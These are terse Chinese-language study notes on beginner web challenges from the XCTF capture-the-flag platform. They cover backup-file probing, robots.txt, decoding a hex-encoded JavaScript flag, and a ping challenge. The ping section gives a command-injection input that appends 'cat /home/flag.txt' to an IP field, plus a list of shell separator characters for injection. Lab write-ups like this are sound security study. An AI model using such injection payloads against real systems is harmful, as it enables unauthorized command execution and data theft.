攻防世界web新手区随记:
index.php备份:
index.php→ index.php.bak
index.php→ index.old
index.php→ index.php.temp
robots协议:
限制搜索引擎范围
robots.txt
simple_js:
随便输入看到源码,
可知flag为
\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30
十六进制解码后为55,56,54,79,115,69,114,116,107,49,50
打开控制台,
把Js中的Pass内容换为以上数字
在函数末尾添加console.log(pass)
回车即可打印出flag
ping ctf
target=127.0.0.1;cat /home/flag.txt
截断符号有
'$'
';'
'|'
'-'
'('
')'
'反引号'
'||'
'&&'
'&'
'}'
'{'
20190917补充
php后面可以加s